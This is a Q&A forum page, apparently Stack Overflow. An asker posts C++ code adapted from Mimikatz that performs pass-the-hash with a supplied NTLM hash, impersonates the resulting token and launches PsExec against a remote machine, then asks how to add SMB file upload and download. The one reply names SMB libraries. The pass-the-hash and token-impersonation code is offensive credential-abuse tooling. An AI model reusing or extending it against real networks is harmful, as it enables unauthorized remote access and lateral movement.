Reputation:
Connect to Windows Server File System with SMB
I have written a program with C++ that can spawn an authenticate cmd.exe process in a workgroup. In further, I can run the psexec.exe program with that authenticated token to connect the server machine.
printf("\n\t");
WarningMessage("%s\n", "Fill following information:");
printf("\n\t\tUsername: ");
wscanf(L"%ls", username);
printf("\t\tDomain: ");
wscanf(L"%ls", domain);
printf("\t\tNTLM Hash: ");
wscanf(L"%ls", hash_ntlm);
printf("\t\tDestination IP: ");
wscanf(L"%ls", ip_destination);
wcscpy(process_name, TEXT("PSExec.exe \\\\"));
wcscat(process_name, ip_destination);
wcscat(process_name, TEXT(" cmd.exe"));
if (kull_m_string_stringToHex(hash_ntlm, ntlm, LM_NTLM_HASH_LENGTH))
{
data.NtlmHash = ntlm;
}
else
{
printf("\t");
ErrorMessage("%s\n", "ntlm hash/rc4 key length must be 32 (16 bytes)");
}
printf("\n\t");
NormalMessage("%s\n", "PTH login to the Active Directory process has been started:");
if (data.NtlmHash)
{
if (LoginWithActiveDirectory(KULL_M_PROCESS_CREATE_LOGON, process_name, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, username, domain, L"", &process_infos, FALSE))
{
printf("\n");
PrintColorful(2, "\t\tPID: ");
printf("%d\n", process_infos.dwProcessId);
PrintColorful(2, "\t\tTID: ");
printf("%d\n\n", process_infos.dwThreadId);
if (OpenProcessToken(process_infos.hProcess, TOKEN_READ | (is_impersonate ? TOKEN_DUPLICATE : 0), &handle_token))
{
if (GetTokenInformation(handle_token, TokenStatistics, &token_status, sizeof(token_status), &needed_size))
{
kuhl_m_sekurlsa_pth_luid(&data);
if (is_impersonate)
{
if (DuplicateTokenEx(handle_token, TOKEN_QUERY | TOKEN_IMPERSONATE, NULL, SecurityDelegation, TokenImpersonation, &handle_new_token))
{
if (SetThreadToken(NULL, handle_new_token))
{
NormalMessage("%s\n", "Token Impersonated.");
}
else
{
ErrorMessage("%s\n", "SetThreadToken failed.");
CloseHandle(handle_new_token);
}
}
else
{
ErrorMessage("%s\n", "DuplicateTokenEx failed.");
NtTerminateProcess(process_infos.hProcess, STATUS_SUCCESS);
}
}
else
{
NtResumeProcess(process_infos.hProcess);
}
}
else
{
ErrorMessage("%s\n", "GetTokenInformation failed.");
}
}
else
{
ErrorMessage("%s\n", "OpenProcessToken failed.");
}
CloseHandle(process_infos.hThread);
CloseHandle(process_infos.hProcess);
printf("\n");
}
else
{
printf("\n\t");
ErrorMessage("%s\n", "PTH login to the Active Directory process has failed.");
}
}
else
{
printf("\t");
ErrorMessage("%s\n", "Missing some arguments for authentication.");
}
}
However, When psexec.exe executed it gives me just a command prompt environment for the server in which I can execute the command and see the result back but I wanted to have ability to download/upload files from the server machine.
However, unfortunately, I don't know how can I write a program that lets me download or upload files onto the server machine even after authentication.
I have searched and found out I should use SMB/CIFS but I couldn't find even a brief introduction which explain what should I do to implement such a program. Someone could share information about this problem?
Upvotes: 0
Views: 2015
Answers (1)
Reputation: 368
It depends on the OS you are using to run your program.
Windows: There are several Win API that you can use to connect to the requested remote server.
Linux: You can use Samba - see this for using Samba in C++ * Just note that Samba is a GPL3 product.
Any OS: There is a commercial licence product called YNQ that you can look into, its a C base product, so I don't think that it will be hard to port to your program.
Upvotes: 0
Related Questions
- Connect to SMB Server over command line
- How to automatically mount a Windows SMB (Server Message Block) share from a network device to your linux computer
- CIFS server in .NET?
- Create smb server in order to share files
- SMB Filesharing on Windows CE 6
- cifs/samba client library
- NFS or SMB on Windows Share
- cifs/samba client library in C#
- Accessing network shares
- Is There a Windows SMB Client Opened Implement